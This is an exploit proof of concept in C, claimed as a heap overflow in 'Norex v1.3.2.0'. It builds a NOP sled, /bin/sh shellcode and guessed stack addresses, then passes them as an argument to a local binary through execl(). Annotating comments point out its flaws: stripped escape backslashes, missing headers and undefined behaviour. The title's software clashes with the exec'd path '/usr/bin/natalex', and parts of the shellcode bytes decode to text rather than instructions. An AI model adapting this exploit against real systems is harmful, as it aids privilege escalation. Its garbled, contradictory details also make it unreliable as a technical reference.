# Title : Norex v1.3.2.0 Argument Heap-Overflow
# Published : 2010-06-22
# Author : GoteGELENZI
# Author: SiktirEdenzi aka GoteGELENZI
# Software Link: http://www.muratkaslioglu.com/norex/
# Version: v1.3.2.0
# Tested on: Linux
# CVE :
# Code :
/* Program that main() exec()s with the crafted argument.  Note that the
 * trailing " -r" is part of this one string, so execl() below receives it as
 * part of the file path rather than as a separate argument. */
#define PATH_ZEN "/usr/bin/natalex -r"
/* Size of the sled+payload region laid out in main(); it is smaller than the
 * 4096-byte buffer main() allocates, so the rest of that buffer is never
 * written. */
#define OFFER_SIZE 1024
/* Added to the value of get_esp() when forming the address written after the
 * payload (assigned to `ofs` in main()). */
#define DEFAULT_OFFSET 50
/*
 * Return the current stack pointer (i386 only).
 *
 * The inline asm copies %esp into %eax and the function then falls off the
 * end with no `return` statement, relying on the i386 calling convention to
 * treat whatever is in %eax as the return value.  Reaching the end of a
 * non-void function and using the result is undefined behavior in C, and an
 * optimizing compiler is free to clobber %eax between the asm and the return,
 * so this is not a reliable way to read the stack pointer.  It also does not
 * compile on non-x86 targets.  `u_long` comes from <sys/types.h>, which this
 * listing does not include.
 */
u_long get_esp()
{
__asm__("movl %esp, %eax");
}
/*
 * Entry point of the proof-of-concept.
 *
 * Builds a 4096-byte heap buffer and passes it as the single command-line
 * argument of PATH_ZEN via execl().  The region actually written is:
 *   [0x90 filler up to OFFER_SIZE - strlen(execshell)]
 *   [the execshell bytes]
 *   [two copies of get_esp() + ofs, one `long` each]
 *   [one NUL byte]
 *
 * Observations for anyone reading this listing:
 *  - Implicit `int` return type and no `return` (pre-C99 style); argc/argv
 *    are unused.
 *  - No headers are included, so malloc/printf/exit/memset/strlen/alarm/
 *    execl and the u_char/u_int typedefs are all implicitly declared; this
 *    will not build as-is under C99 or later.
 *  - The escape sequences in this listing have lost their backslashes
 *    (e.g. "memoryn" where "memory\n" is clearly intended), so every string
 *    literal here is plain ASCII text as printed, not the bytes the hex
 *    digits suggest.
 *  - The address loop writes 8/4 == 2 elements of type `long`; that is 8
 *    bytes only where sizeof(long) == 4, and 16 bytes on LP64 Linux.
 *  - On allocation failure the program reports the error but exits with
 *    status 0.
 *  - Mitigation context: an address guess plus NOP filler like this is
 *    exactly what ASLR and non-executable stack/heap (NX/DEP) are designed
 *    to break; both are enabled by default on current Linux systems.
 */
main(int argc, char **argv)
{
/* Payload bytes as printed in the listing (see the note on lost backslashes
 * above); the trailing "/bin/sh" is a plain C string suffix. */
u_char execshell[] =
"xebx24x5ex8dx1ex89x5ex0bx33xd2x89x56x07x89x56x0f"
"xb8x1bx56x34x12x62x1fx74x1fx6ex20x62x65x79x61x7a"
"x20x1fx61x70x6bx61x6cx61x72x20x61x6ex61x6ex1fx7a"
"x1fx20x73x69x6bx65x6ex7ax69x2cx20x68x75x7ax65x79"
"x66x65x20x73x65x6cx61x6dx6cx61x72x20x64x6fx73x74"
"x75x6dx20x6cx6fx6cx27x64x35x10x56x34x12x8dx4ex0b"
"x8bxd1xcd"
"x80x33xc0x40xcdx80xe8xd7xffxffxff/bin/sh";
char *buff = NULL;         /* the argument buffer handed to execl() */
unsigned long *addr_ptr = NULL; /* cursor used for the two address writes */
char *ptr = NULL;          /* byte cursor into buff */
int i;
int ofs = DEFAULT_OFFSET;  /* offset added to get_esp() */
/* Only OFFER_SIZE + 2*sizeof(long) + 1 bytes of this are ever written;
 * the buffer is never freed, which is moot once execl() replaces the
 * process image. */
buff = malloc(4096);
if(!buff)
{
/* "memoryn": the newline escape lost its backslash in the listing. */
printf("can't allocate memoryn");
exit(0);                   /* note: reports success despite the failure */
}
ptr = buff;
/* Filler first.  strlen() on execshell treats it as a C string, so the
 * length depends on the first NUL in the literal as printed. */
memset(ptr, 0x90, OFFER_SIZE-strlen(execshell));
ptr += OFFER_SIZE-strlen(execshell);
/* Copy the payload byte by byte (signed/unsigned comparison: i is int,
 * strlen() returns size_t). */
for(i=0;i < strlen(execshell);i++)
*(ptr++) = execshell[i];
/* Cast to `long *` while addr_ptr is `unsigned long *`: a pointer-type
 * mismatch a compiler will warn about. */
addr_ptr = (long *)ptr;
/* 8/4 == 2 iterations; element size is sizeof(long), not fixed at 4. */
for(i=0;i < (8/4);i++)
*(addr_ptr++) = get_esp() + ofs;
ptr = (char *)addr_ptr;
*ptr = 0;                  /* NUL-terminate so buff is a valid C string */
/* Cancel any pending SIGALRM before exec; result deliberately ignored. */
(void)alarm((u_int)0);
/* argv[0] is set to "umount"; PATH_ZEN (including its embedded " -r") is
 * looked up as a single file path.  If execl() fails, main just falls off
 * the end. */
execl(PATH_ZEN, "umount", buff, NULL);
}